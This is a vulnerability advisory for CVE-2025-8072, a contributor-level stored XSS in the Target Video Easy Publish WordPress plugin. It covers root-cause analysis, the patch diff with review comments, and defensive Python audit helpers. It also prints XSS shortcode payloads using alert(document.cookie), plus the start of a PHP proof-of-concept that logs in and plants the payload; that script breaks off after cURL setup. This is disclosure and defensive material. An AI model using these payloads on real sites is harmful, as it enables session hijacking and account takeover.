Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-8072: Target Video Easy Publish <= 3.8.8 – Authenticated (Contributor+) Stored Cross-Site Scripting via placeholder_img Parameter (brid-video-easy-publish)

CVE ID CVE-2025-8072
Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 3.8.8
Patched Version 3.8.9
Disclosed January 26, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-8072:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Target Video Easy Publish WordPress plugin. The issue affects all plugin versions up to and including 3.8.8. Attackers with Contributor-level access or higher can inject arbitrary JavaScript payloads that execute when users view pages containing the malicious content. The CVSS score of 6.4 reflects the medium severity of this privilege-dependent stored XSS.

The root cause is missing input sanitization and output escaping for the placeholder_img shortcode attribute in the plugin's shortcode handler. The vulnerable code is in lib/BridShortcode.php, in the parseShortcode() method at line 204. Before the patch, the plugin concatenated the attribute value straight into a double-quoted string inside the player configuration it emits, with no sanitization or escaping in between, so nothing removed or encoded the characters that terminate that string:

$append .= ',"placeholder_img":"' . $attrs['placeholder_img'] . '"';

Exploitation requires an authenticated attacker with at least Contributor privileges. The attacker creates or edits a post containing a Target Video Easy Publish shortcode with a crafted placeholder_img attribute, with placeholder="true" set as in the example so the handler takes the placeholder branch. The payload would resemble:

[bridtv placeholder_img="javascript:alert(document.cookie)" placeholder="true"]

When the post is saved and later rendered, the unescaped value is written into the page and the injected JavaScript executes in the viewing user's browser. Whether a javascript: URL itself fires depends on how the player consumes placeholder_img; the structural problem the diff shows is that any double quote or other string-terminating character in the value lands unescaped inside the quoted JSON string of the player configuration, so the attacker controls the structure of that object rather than a single value. The attack surface is the WordPress editor, where any user with edit permissions can insert plugin shortcodes. Contributors lack the unfiltered_html capability, but wp_kses leaves shortcode text intact on save, which is why a plugin must escape its own shortcode attributes at output.
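The following is an added example, not Atomic Edge's or the plugin's code: a Python audit helper that performs the two checks a responder wants after reading the above. It reads the plugin header to decide whether the installed version is at or below 3.8.8, and it scans stored post content for [bridtv ...] shortcodes whose placeholder_img value is not a plain http(s) URL or contains characters that would terminate the double-quoted string the handler builds. The attribute grammar follows WordPress shortcode_parse_atts() (double-quoted, single-quoted and bare values); the shortcode name bridtv is taken from the example payload above, and the plugin header and post rows are constructed sample data.

```python
"""Audit helper for CVE-2025-8072 (added example, not the plugin's code).

Checks: (1) plugin version from the brid.php header, (2) stored posts for
[bridtv ...] shortcodes with a placeholder_img value that could terminate
the double-quoted string the shortcode handler builds.
The sample header and posts at the bottom are constructed test data.
"""
import re
from typing import Dict, Iterator, List, Optional, Tuple

PATCHED = (3, 8, 9)  # first fixed release per the advisory

# "Version:" line of a WordPress plugin header
_VERSION_RE = re.compile(r"^\s*\*\s*Version:\s*([0-9][0-9.]*)", re.M)

# [bridtv ...] shortcode and its attribute grammar, close to shortcode_parse_atts():
# name="v", name='v' or name=v
_SHORTCODE_RE = re.compile(r"\[bridtv\b([^\]]*)\]", re.I)
_ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s\]"']+))""")

# A benign placeholder is a plain http(s) URL containing none of the characters
# that end a quoted JSON string, close a script element or switch URL scheme.
_PLAIN_URL_RE = re.compile(r"""^https?://[^\s"'<>\\{}]+$""", re.I)
_SUSPICIOUS_RE = re.compile(r"""["'\\<>{}]|javascript:|data:|&#""", re.I)


def plugin_version(header_text: str) -> Optional[Tuple[int, ...]]:
    """Return the plugin version as a tuple, or None if no header line is found."""
    m = _VERSION_RE.search(header_text)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def is_vulnerable_version(header_text: str) -> bool:
    """True when the installed version is below the first patched release."""
    v = plugin_version(header_text)
    return v is not None and v < PATCHED


def shortcode_attrs(body: str) -> Dict[str, str]:
    """Parse the attribute list of one shortcode into a name -> value dict."""
    attrs = {}
    for name, dq, sq, bare in _ATTR_RE.findall(body):
        attrs[name.lower()] = dq or sq or bare
    return attrs


def find_suspicious(post_id: int, content: str) -> Iterator[Dict[str, object]]:
    """Yield one finding per [bridtv] shortcode whose placeholder_img looks hostile."""
    for m in _SHORTCODE_RE.finditer(content):
        value = shortcode_attrs(m.group(1)).get("placeholder_img")
        if value is None:
            continue
        if _SUSPICIOUS_RE.search(value) or not _PLAIN_URL_RE.match(value):
            yield {"post_id": post_id, "shortcode": m.group(0), "placeholder_img": value}


def audit(header_text: str, posts: List[Tuple[int, str]]) -> Dict[str, object]:
    """Combine the version check with a scan of (post_id, post_content) rows."""
    findings = [f for post_id, content in posts for f in find_suspicious(post_id, content)]
    return {"vulnerable_version": is_vulnerable_version(header_text), "findings": findings}


# Constructed sample data: a 3.8.8 header and four post_content rows.
SAMPLE_HEADER = "<?php\n/**\n * Plugin Name: TargetVideo\n * Version: 3.8.8\n */"
SAMPLE_POSTS = [
    (11, 'Intro [bridtv video="123" placeholder="true" '
         'placeholder_img="https://cdn.example.test/poster.jpg?w=640&h=360"]'),
    (12, """Weekly [bridtv placeholder="true" placeholder_img='bad"quote']"""),
    (13, '[bridtv placeholder="true" placeholder_img="javascript:alert(document.domain)"]'),
    (14, 'No placeholder here [bridtv video="9"]'),
]

if __name__ == "__main__":
    result = audit(SAMPLE_HEADER, SAMPLE_POSTS)
    print("vulnerable version:", result["vulnerable_version"])
    for f in result["findings"]:
        print(f"post {f['post_id']}: placeholder_img={f['placeholder_img']!r}")
```

Feed find_suspicious() the (ID, post_content) rows from wp_posts (a wp_posts export or the output of a WP-CLI database query will do). A hit tells you which post to inspect and which author to look at through post_author and the revision history, which is the pivot from "the site was vulnerable" to "the site was exploited".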

The patch adds input sanitization and output escaping. In BridShortcode.php line 204 the value now passes through three functions, innermost first: wp_unslash() removes the slashes WordPress adds to request data, sanitize_text_field() strips tags, line breaks, tabs, extra whitespace and percent-encoded octets, and esc_html() entity-encodes &, <, >, " and ' for output:

esc_html(sanitize_text_field(wp_unslash($attrs['placeholder_img'])))

Because a double quote becomes &quot; and < becomes &lt;, the value can no longer terminate the quoted string or close a script element, which is what blocks the injection. One caveat for anyone relying on placeholder URLs: esc_html() is the escaper for HTML text, while this value sits inside a JSON string. If that JSON is emitted in an HTML attribute the entities are decoded and a plain image URL survives; if it is emitted inside a <script> block they are not, so a URL with a query string reaches the player as ...?w=640&amp;h=360, and sanitize_text_field() additionally drops %xx sequences from the path. wp_json_encode() is the escaper matched to a JSON-in-script context. The diff does not show where $append is finally written, so confirm the behaviour on a test install before depending on URLs with query strings or encoded characters.
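To see why the choice of escaper matters for this fix, here is an added example (not the plugin's code) in Python that models the three ways the placeholder_img value can be placed into the fragment parseShortcode() builds and then reads each back with a JSON parser: raw concatenation as in 3.8.8, HTML-entity encoding standing in for esc_html() (Python's html.escape encodes the same five characters; WordPress writes the apostrophe as &#039; rather than &#x27;), and JSON string encoding standing in for wp_json_encode() (PHP's json_encode additionally escapes / as \/, which any parser reverses). The ',"placeholder":"true"' prefix is the fragment visible in the patch; the surrounding {"id":"1" ... } wrapper is an assumption so that the fragment parses.

```python
"""Added example (not the plugin's code): how the placeholder_img value fares
under three escapers once it is concatenated into the player-configuration
fragment that parseShortcode() builds, judged by what a JSON parser reads back.
"""
import html
import json
from typing import Dict, Optional

PREFIX = ',"placeholder":"true"'               # fragment visible in the patch
WRAPPER_OPEN, WRAPPER_CLOSE = '{"id":"1"', '}'  # assumed surrounding object


def build_config(placeholder_img: str, mode: str) -> str:
    """Rebuild the fragment the way 3.8.8 ('vulnerable'), 3.8.9 ('patched')
    or a wp_json_encode()-style approach ('json') would."""
    if mode == "vulnerable":
        value = placeholder_img                           # raw concatenation
    elif mode == "patched":
        value = html.escape(placeholder_img, quote=True)  # stands in for esc_html()
    elif mode == "json":
        value = json.dumps(placeholder_img)[1:-1]         # JSON escaping, outer quotes dropped
    else:
        raise ValueError(mode)
    append = PREFIX + ',"placeholder_img":"' + value + '"'
    return WRAPPER_OPEN + append + WRAPPER_CLOSE


def parse_config(text: str) -> Optional[dict]:
    """What a JSON consumer would make of the emitted fragment (None = unparseable)."""
    try:
        return json.loads(text)
    except json.JSONDecodeError:
        return None


def compare(placeholder_img: str) -> Dict[str, Dict[str, object]]:
    """For each mode: does the output parse, which keys does the object end up
    with, and what value does the parser recover for placeholder_img?"""
    report = {}
    for mode in ("vulnerable", "patched", "json"):
        cfg = parse_config(build_config(placeholder_img, mode))
        report[mode] = {
            "parses": cfg is not None,
            "keys": sorted(cfg) if cfg else [],
            "value": cfg.get("placeholder_img") if cfg else None,
        }
    return report


if __name__ == "__main__":
    # First a value that terminates the string and smuggles in a second key,
    # then a legitimate poster URL with a query string (constructed samples).
    for sample in ('poster.jpg","autoplay":"1', "https://cdn.example.test/p.jpg?w=640&h=360"):
        print(sample)
        for mode, r in compare(sample).items():
            print(f"  {mode:10s} parses={r['parses']} keys={r['keys']} value={r['value']!r}")
```

The first sample shows the vulnerable concatenation yielding an object with an attacker-chosen autoplay key, while both escapers keep the key set intact. The second shows the difference between them: the entity encoder returns the URL with &amp; in it, the JSON encoder returns it unchanged, which is the functional trade-off the patch made.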

Successful exploitation allows attackers to inject arbitrary JavaScript that executes in the context of any user viewing the compromised page. This enables session hijacking, administrative actions through forged requests, content defacement, and malware distribution. The stored nature means the payload persists across sessions and affects all visitors. While Contributor privileges are required for initial injection, the payload executes for all users including administrators, potentially leading to privilege escalation.

Differential between vulnerable and patched code

Code Diff
--- a/brid-video-easy-publish/brid.php
+++ b/brid-video-easy-publish/brid.php
@@ -4,7 +4,7 @@
  * Plugin Name: TargetVideo
  * Plugin URI: https://target-video.com/
  * Description: This plugin allows for the easy insertion of <a href="https://cms.target-video.com" target="_blank">TargetVideo</a> videos and playlists into your Wordpress site or blog. TargetVideo plugin seamlessly integrates with the Wordpress Media feature and provides an easy way to publish and monetize your video library.
- * Version: 3.8.8
+ * Version: 3.8.9
  * Author: TargetVideo
  * Settings: TargetVideo
  * Author URI: https://target-video.com/
@@ -13,7 +13,7 @@

 //error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
 //DO NOT CHANGE
-define('BRID_PLUGIN_VERSION', '3.8.8'); // Also change in upper comment
+define('BRID_PLUGIN_VERSION', '3.8.9'); // Also change in upper comment
 define('DEFAULT_PLAYER_ID', '1');
 define('DEFAULT_PARTNER_ID', '264');
 define('BRID_PLUGIN_DIR', dirname(__FILE__));
--- a/brid-video-easy-publish/html/form/add_youtube.php
+++ b/brid-video-easy-publish/html/form/add_youtube.php
@@ -173,7 +173,7 @@
 							</div>
 						</div>
 					</td>
-					<td class="videoTitleTable">
+					<td class="videoTitleTable" style="padding:0 10px;">
 						<div style="float:left;width:100%;">
 							<a href="{{providerUrl}}{{id}}" id="video-title-{{id}}" class="listTitleLink" title="View on {{service}}: {{title}}" target="_blank">{{title}}</a>
 							<div class="videoUploadedBy">
--- a/brid-video-easy-publish/html/form/post/add_youtube.php
+++ b/brid-video-easy-publish/html/form/post/add_youtube.php
@@ -165,7 +165,7 @@
 			<tbody>
 				<tr id="video-row-{{id}}" data-id="{{id}}" class="partnerTr" style="background-color:{{bgColor}}">
 					<td style="width:10px;"></td>
-					<td class="imgTable">
+					<td class="imgTable" style="vertical-align:top;">
 						<div class="centerImg centerImgFix">
 							<div class="centerImgWrapper">
 								<a href="{{providerUrl}}{{id}}" title="View on {{service}}: {{title}}" target="_blank">
@@ -175,12 +175,13 @@
 							<div class="time" id="video-duration-{{id}}">{{duration}}</div>
 						</div>
 					</td>
-					<td class="videoTitleTable">
+					<td class="videoTitleTable" style="padding:0 10px;">
 						<div style="float:left;width:100%;">
 							<a href="{{providerUrl}}{{id}}" id="video-title-{{id}}" class="listTitleLink" title="View on {{service}}: {{title}}" target="_blank">{{title}}</a>
 							<div class="videoUploadedBy">
 								<div class="siteVideosNum">
 									<?php _e('By'); ?>: {{author}}   
+									<br>
 									<span style="color:#b5b5b5"><?php _e('Published'); ?>: {{published}}</span>
 									<br><br>
 									<span id="VideoStatusWrap" style="display:none">
@@ -319,6 +320,8 @@
 					}
 				}

+				jQuery("#VideoExternalUrl").val(responseData.url);
+
 				jQuery("td#td" + this.id + ' img').remove();
 				jQuery("td#td" + this.id).append('<div class="videoAdded">VIDEO ADDED!</div><div class="videoAdded2"><a href="#">EDIT IT HERE</a></div>');

--- a/brid-video-easy-publish/html/form/settings.php
+++ b/brid-video-easy-publish/html/form/settings.php
@@ -197,13 +197,10 @@
 											<small class="brid-notice"><?php _e('All your content on TargetVideo platform will be managed under this site/account'); ?>.<br /> <?php _e('To add more sites, please'); ?> <a href="https://cms.target-video.com/" target="_blank"><?php _e('login to TargetVideo'); ?></a>.</small>
 										</td>
 									</tr>
-									<?php if ($wp_ver < 5) { ?>
-										<tr>
-											<td><?php _e('Replace default player with BridTv player'); ?></td>
-											<td><?php BridForm::drawField('ovr_def', ['inputName' => 'brid_options[ovr_def]', 'type' => 'radio', 'label' => 'off']); ?></td>
-										</tr>
-									<?php } ?>
-
+									<tr>
+										<td><?php _e('Replace default player with TargetVideo player'); ?></td>
+										<td><?php BridForm::drawField('ovr_def', ['inputName' => 'brid_options[ovr_def]', 'type' => 'radio', 'label' => 'off']); ?></td>
+									</tr>
 									<tr>
 										<td><?php _e('Raw embed code'); ?></td>
 										<td><?php BridForm::drawField('raw_embed', ['inputName' => 'brid_options[raw_embed]', 'type' => 'radio', 'label' => 'off']); ?></td>
@@ -563,15 +560,27 @@
 											</small>
 										</td>
 										<td width="20%">
-											<?php if ($v['Player']['id'] == $playerSelected) { ?>
-
-												<a href="#" class="set-as-default-player default" data-model="player" data-id="<?php echo $v['Player']['id']; ?>">Default</a>
-
-											<?php } else { ?>
-
-												<a href="#" class="set-as-default-player" data-model="player" data-id="<?php echo $v['Player']['id']; ?>">Set as WP default</a>
-
-											<?php } ?>
+											<?php if ($v['Player']['id'] == $playerSelected) : ?>
+												<a
+													href="#"
+													class="set-as-default-player default"
+													data-model="player"
+													data-id="<?php echo $v['Player']['id']; ?>"
+													data-width="<?php echo $v['Player']['width']; ?>"
+													data-height="<?php echo $v['Player']['height']; ?>">
+													Default
+												</a>
+											<?php else : ?>
+												<a
+													href="#"
+													class="set-as-default-player"
+													data-model="player"
+													data-id="<?php echo $v['Player']['id']; ?>"
+													data-width="<?php echo $v['Player']['width']; ?>"
+													data-height="<?php echo $v['Player']['height']; ?>">
+													<?php _e('Set as WP default'); ?>
+												</a>
+											<?php endif; ?>
 										</td>
 									</tr>
 								<?php } ?>
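Review bot: the new data-width and data-height attributes echo $v['Player']['width'] and $v['Player']['height'] into HTML attributes without esc_attr() or an integer cast, the same gap the existing data-id echo already has. BridActions::setBridProductDefault() casts both with intval() on receipt, so an (int) cast here, e.g. data-width="<?php echo (int) $v['Player']['width']; ?>", would be consistent and closes the gap at the source.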
@@ -658,15 +667,27 @@
 											</small>
 										</td>
 										<td width="20%">
-											<?php if ($v['Unit']['id'] == $unitSelected) { ?>
-
-												<a class="set-as-default-unit default" data-model="unit" data-id="<?php echo $v['Unit']['id']; ?>"><?php _e('Default'); ?></a>
-
-											<?php } else { ?>
-
-												<a href="#" class="set-as-default-unit" data-model="unit" data-id="<?php echo $v['Unit']['id']; ?>"><?php _e('Set as WP default'); ?></a>
-
-											<?php } ?>
+											<?php if ($v['Unit']['id'] == $unitSelected) : ?>
+												<a
+													href="#"
+													class="set-as-default-unit default"
+													data-model="unit"
+													data-id="<?php echo $v['Unit']['id']; ?>"
+													data-width="<?php echo $v['Unit']['width']; ?>"
+													data-height="<?php echo $v['Unit']['height']; ?>">
+													<?php _e('Default'); ?>
+												</a>
+											<?php else : ?>
+												<a
+													href="#"
+													class="set-as-default-unit"
+													data-model="unit"
+													data-id="<?php echo $v['Unit']['id']; ?>"
+													data-width="<?php echo $v['Unit']['width']; ?>"
+													data-height="<?php echo $v['Unit']['height']; ?>">
+													<?php _e('Set as WP default'); ?>
+												</a>
+											<?php endif; ?>
 										</td>
 									</tr>
 								<?php } ?>
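Review bot: same point as the player block: $v['Unit']['width'] and $v['Unit']['height'] (and the existing data-id) are printed into attributes unescaped; use esc_attr() or an (int) cast.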
@@ -1930,7 +1951,8 @@
 					e.preventDefault();
 					var type = _self.data('model');
 					var id = _self.data('id');
-
+					var width = _self.data('width');
+					var height = _self.data('height');

 					if (!_self.hasClass('default')) {
 						$Brid.Api.call({
@@ -1938,17 +1960,18 @@
 							data: {
 								action: "setBridProductDefault",
 								"id": id,
+								"width": width,
+								"height": height,
 								"type": type
 							},
 							//callback : { after : { name : "bridPlayerList"} }
 							callback: {
 								before: function() {
-
-									jQuery('.set-as-default-' + type).removeClass('default');
+									// jQuery('.set-as-default-' + type).removeClass('default');
+									jQuery('.set-as-default-player, .set-as-default-unit').removeClass('default').text('Set as WP default');
 									jQuery('.set-as-default-' + type).text('Set as WP default');
 									_self.text('Default');
 									_self.addClass('default');
-
 								}
 							}
 						});
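Review bot: the reset on the new line (jQuery('.set-as-default-player, .set-as-default-unit').removeClass('default').text('Set as WP default')) hard-codes the English label while the markup above prints it through _e(), so on a translated site the label changes language when a default is switched; the line after it, which sets the same text on '.set-as-default-' + type, is now redundant and can go. The reset also clears the "Default" marker of the other type client-side, while setBridProductDefault() only updates the option for the submitted $type, so after one click the page no longer reflects which unit (or player) is stored as default; if that is intended, a comment saying so would help.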
--- a/brid-video-easy-publish/html/library.php
+++ b/brid-video-easy-publish/html/library.php
@@ -5,7 +5,7 @@
 	//Playlist selected videos
 	var selectedVideos = new Array();
 	var playlistTitle = '';
-	window.disable_shortcode = '<?php echo $disable_shortcode; ?>';
+	window.disable_shortcode = '<?php echo (int)$disable_shortcode; ?>';
 	window.CDN_Path = '<?php echo $CDN_Path; ?>';
 </script>
 <div class="supports-drag-drop" style="position: relative;">
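Review bot: the (int) cast on $disable_shortcode closes one raw echo into a JavaScript string, but the next line still prints $CDN_Path unescaped into window.CDN_Path = '...'; pass it through esc_js() or emit it with wp_json_encode() so a quote or backslash in the option value cannot terminate the string.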
--- a/brid-video-easy-publish/html/list/library/videos.php
+++ b/brid-video-easy-publish/html/list/library/videos.php
@@ -163,27 +163,28 @@
 <?php
 if (!empty($videosDataset['data'])) { ?>

-	<table class="list-table">
-		<?php
-		$paginationOrder = '';
-		$direction = '';
-		$field = '';
-		$pagination = $videosDataset['paging']['Video'];
+	<?php
+	$paginationOrder = '';
+	$direction = '';
+	$field = '';
+	$pagination = $videosDataset['paging']['Video'];

-		if (isset($pagination['options']['order'])) {
-			foreach ($pagination['options']['order'] as $k => $v) {
-				$paginationOrder = 'sort:' . $k . '/direction:' . $v . '/';
-				$direction = $v;
-				$field = $k;
-			}
+	if (isset($pagination['options']['order'])) {
+		foreach ($pagination['options']['order'] as $k => $v) {
+			$paginationOrder = 'sort:' . $k . '/direction:' . $v . '/';
+			$direction = $v;
+			$field = $k;
 		}
-		$paginationFields = array(
-			'Title' => array('class' => 'tableTitle', 'field' => 'Video.name'),
-			'Published' => array('class' => 'tableCreated', 'field' => 'Video.publish'),
-			'Syndication' => array('class' => 'tableCreated', 'field' => false),
-		);
+	}
+
+	$paginationFields = array(
+		'Title' => array('class' => 'tableTitle', 'field' => 'Video.name'),
+		'Published' => array('class' => 'tableCreated', 'field' => 'Video.publish'),
+		'Syndication' => array('class' => 'tableCreated', 'field' => false),
+	);
+	?>

-		?>
+	<table class="list-table">
 		<tbody>
 			<tr class="trFirst">
 				<th class="thName">
--- a/brid-video-easy-publish/html/list/playlist/playlistLibrary.php
+++ b/brid-video-easy-publish/html/list/playlist/playlistLibrary.php
@@ -68,7 +68,6 @@
 	var paginationOrder = '';
 	var saved = false;

-	jQuery('#playlistSaveAdd').css('display', 'none');
 	jQuery('#playlistSaveAdd').addClass('disabled');

 	jQuery('#copy_shortcode').css('display', 'inline-block');
@@ -120,7 +119,6 @@

 				i.addClass('details selected');

-				jQuery('#playlistSaveAdd').hide();
 				jQuery('#copy_shortcode').show();

 				var player_selected = $BridWordpressConfig.Player.id;
--- a/brid-video-easy-publish/html/playlist_library.php
+++ b/brid-video-easy-publish/html/playlist_library.php
@@ -39,7 +39,7 @@
 			<input type="text" id="brid_shortcode" style="width: 100px;height: 100px;display: none;" />
 			<div class="media-toolbar-primary">
 				<div class="mainWrapper" style='padding-top:0px;width:auto; position: absolute; right: 0px;top: 5px;width: 100%;text-align: right;'>
-					<div class="bridButton" data-redirect="off" data-colorbox-close="0" id="copy_shortcode" data-method="onPlaylistUpdate" data-form-bind="0" data-form-req="0" style="position: absolute; right: 20px; top: 5px; display:none;">
+					<div class="bridButton" data-redirect="off" data-colorbox-close="0" id="copy_shortcode" data-method="onPlaylistUpdate" data-form-bind="0" data-form-req="0" style="position: absolute; right: 0; display:none;">
 						<div class="buttonLargeContent" id="videoSaveAddText"><?php _e('COPY SHORTCODE'); ?></div>
 					</div>

--- a/brid-video-easy-publish/lib/BridActions.php
+++ b/brid-video-easy-publish/lib/BridActions.php
@@ -150,19 +150,20 @@
 	 */
 	public static function setBridProductDefault()
 	{
-
 		if (!empty($_POST)) {
 			$type = isset($_POST['type']) ? sanitize_text_field($_POST['type']) : '';
-
 			if (in_array($type, ['player', 'unit'])) {
-
 				$id = isset($_POST['id']) ? intval($_POST['id']) : 0;
+				$width = isset($_POST['width']) ? intval($_POST['width']) : 16;
+				$height = isset($_POST['height']) ? intval($_POST['height']) : 9;
 				if ($id) {
-
 					BridOptions::updateOption($type, $id);
+					BridOptions::updateOption('width', $width);
+					BridOptions::updateOption('height', $height);
 				}
 			}
 		}
+
 		die("end");
 	}
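Review bot: intval() on width and height accepts 0 and negative values (intval('abc') is 0), which would store an unusable player size; fall back to the 16/9 defaults or clamp to a minimum of 1 when the cast yields a non-positive number. The hunk also shows no check_ajax_referer() or current_user_can() guard inside setBridProductDefault(); if those are enforced where the AJAX action is registered, a comment here pointing at that would save the next reviewer the search.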

@@ -448,7 +449,7 @@
 			$BridForm = new BridForm();

 			$disable_shortcode_selectbox = [
-				"0" => "No",
+				"" => "No",
 				"1" => "Disable if SD is not encoded",
 				"2" => "Disable if ALL versions are not encoded",
 			];
--- a/brid-video-easy-publish/lib/BridApi.php
+++ b/brid-video-easy-publish/lib/BridApi.php
@@ -230,7 +230,7 @@

         if (!empty($arguments['query'])) {
             foreach ($arguments['query'] as $k => $queryPart) {
-                $arguments['query'][$k] = str_replace(":", "=", $queryPart);
+                $arguments['query'][$k] = str_replace([":", "/"], ["=", "&"], $queryPart);
             }
             $queryStr = implode('&', $arguments['query']);
             $url .= "?{$queryStr}";
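Review bot: replacing every "/" with "&" inside a query part treats any slash in a value as a parameter separator, so a value that is itself a path or URL is split into spurious parameters. If the intent is to accept Cake-style "key:value/key:value" strings, split on "/" first and urlencode() each value rather than rewriting the whole string; http_build_query() on the resulting array does both and also handles "=" and "&" inside values.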
--- a/brid-video-easy-publish/lib/BridHtml.php
+++ b/brid-video-easy-publish/lib/BridHtml.php
@@ -1307,7 +1307,18 @@
 	}
 }

-
+// Debug
+function dump($data)
+{
+	print "<pre>";
+	print_r($data);
+	print "</pre>";
+}
+function dd($data)
+{
+	dump($data);
+	die;
+}

 //Pre save filter to brid code
 add_filter('content_save_pre', array('BridHtml', 'my_filter_brid_iframe_to_short'), 9, 1);
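Review bot: dump() and dd() are declared as unconditional global functions. Both names are widely used (the Symfony and Laravel var-dumper packages declare dd()), so activating this plugin beside another that declares them produces a "Cannot redeclare" fatal error. Either drop the debug helpers from the release build or guard them with if (!function_exists('dd')) and use a prefixed name such as brid_dd().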
--- a/brid-video-easy-publish/lib/BridShortcode.php
+++ b/brid-video-easy-publish/lib/BridShortcode.php
@@ -201,7 +201,7 @@
 				$append = ',"placeholder":"true"';

 				if (isset($attrs['placeholder_img'])) {
-					$append .= ',"placeholder_img":"' . $attrs['placeholder_img'] . '"';
+					$append .= ',"placeholder_img":"' . esc_html(sanitize_text_field(wp_unslash($attrs['placeholder_img']))) . '"';
 				}
 				if (isset($attrs['placeholder_type'])) {
 					$append .= ',"placeholder_type":"og_image"';
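Review bot: esc_html() is the HTML-body escaper, but the value is concatenated into a double-quoted JSON string. It does close the reported injection, since a double quote becomes &quot; and < becomes &lt;, so the string can no longer be terminated or a script element closed; the cost is that an ampersand in a legitimate placeholder URL becomes &amp;, which is only decoded back if this JSON ends up inside an HTML attribute, and sanitize_text_field() strips %xx sequences from the path. If $append is emitted inside a <script> block, build the configuration as a PHP array and print it with wp_json_encode(), which escapes for exactly that context and keeps the URL intact. The placeholder_type branch below is safe only because it ignores the attribute value.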
@@ -410,6 +410,9 @@
 			$embedCode .= '</iframe>';
 		}

+		// Add custom data to JSON: /wp-json/wp/v2/posts
+		self::restApiAddField($seoOptions);
+
 		return $embedCode;
 	}
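Review bot: self::restApiAddField($seoOptions) is invoked from the embed rendering path, so register_rest_field() runs during content rendering rather than on the rest_api_init hook, and only in requests that have rendered a shortcode. Register the field once on rest_api_init and resolve the video data for the post inside the callback instead.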

@@ -465,6 +468,10 @@
 		$src = '';

 		$feat_image = wp_get_attachment_url(get_post_thumbnail_id(get_the_ID()));
+		$video_source = isset($atts["mp4"]) ? $atts["mp4"] : null;
+		if ($video_source == null) {
+			$video_source = isset($atts["src"]) ? $atts["src"] : "";
+		}

 		$postId = get_the_ID();
 		static $counter = 1;
@@ -474,7 +481,7 @@

 		$counter++;
 		//Front-end part
-		$src .= "<!--WP embed code replace Video object - Brid Ver {BRID_PLUGIN_VERSION} --><script type='text/javascript' src='{CLOUDFRONT}player/build/brid.min.js'></script><div id='Brid_{$divId}' class='brid' style='width: {$size['width']}; height: {$size['height']};'></div><script type='text/javascript'> $bp('Brid_{$divId}', {"id":"{$playerId}", "stats":{"wps":1}, "video": {src: "{$atts['mp4']}", name: "{htmlspecialchars(get_the_title())}", image:"{$feat_image}"}, "width":"{$size['width']}", "height":"{$size['height']}"});</script>";
+		$src .= '<!--WP embed code replace Video object - Brid Ver.' . BRID_PLUGIN_VERSION . ' --><script type="text/javascript" src="' . CLOUDFRONT . 'player/build/brid.min.js"></script><div id="Brid_' . $divId . '" class="brid" style="width: ' . $size["width"] . '; height: ' . $size["height"] . ';"></div><script type="text/javascript"> $bp("Brid_' . $divId . '", {"id":"' . $playerId . '", "stats":{"wps":1}, "video": {"src": "' . esc_attr($video_source) . '", "name": "' . htmlspecialchars(get_the_title()) . '", "image":"' . $feat_image . '"}, "width":"' . $size["width"] . '", "height":"' . $size["height"] . '"});</script>';

 		return $src;
 	}
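Review bot: esc_attr($video_source) is applied inside a JavaScript object literal within a <script> element, where HTML-attribute entities are not decoded, and htmlspecialchars(get_the_title()) has the same context mismatch; $feat_image, $divId, $playerId and $size are still interpolated raw. Building the $bp() argument as a PHP array and printing it with wp_json_encode() escapes every field for the script context at once. The rewrite does fix a real bug in the old line: {BRID_PLUGIN_VERSION} and {CLOUDFRONT} inside a double-quoted PHP string are not interpolated (constants never are), so the old embed printed those names literally.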
@@ -518,6 +525,24 @@

 		return array('width' => $width, 'height' => $height);
 	}
+
+	public static function restApiAddField($seoOptions)
+	{
+		$data = [];
+		foreach (['contenturl', 'thumbnailurl'] as $name) {
+			if (isset($seoOptions[$name])) {
+				$data[$name] = $seoOptions[$name];
+			}
+		}
+
+		register_rest_field('post', 'video_data', [
+			'get_callback' => function ($post_arr) use ($data) {
+				return $data;
+			},
+			'update_callback' => null,
+			'schema' => null,
+		]);
+	}
 }

 $overrideDefaultVideo = BridOptions::getOption('ovr_def', true);
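Review bot: the get_callback closure in restApiAddField() ignores its $post_arr argument and returns the $data captured when the last shortcode was rendered, so every post in a REST response carries the same contenturl/thumbnailurl (or none when no shortcode ran in that request). Look the values up from the post identified by $post_arr['id'] inside the callback, declare a schema instead of null so clients know the field's shape, and move the register_rest_field() call onto rest_api_init.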

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-8072 - Target Video Easy Publish <= 3.8.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via placeholder_img Parameter

// Configuration
$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_password';

// Malicious shortcode payload - XSS via placeholder_img parameter
$malicious_shortcode = '[bridtv placeholder_img="javascript:alert(document.domain)" placeholder="true"]';
$post_title = 'Test Post with XSS Payload';
$post_content = 'This post contains a malicious Target Video Easy Publish shortcode. ' . $malicious_shortcode;

// Initialize cURL session; the cookie jar carries the WordPress login session
$cookie_jar = tempnam(sys_get_temp_dir(), 'wpcookie');
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_jar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_jar);
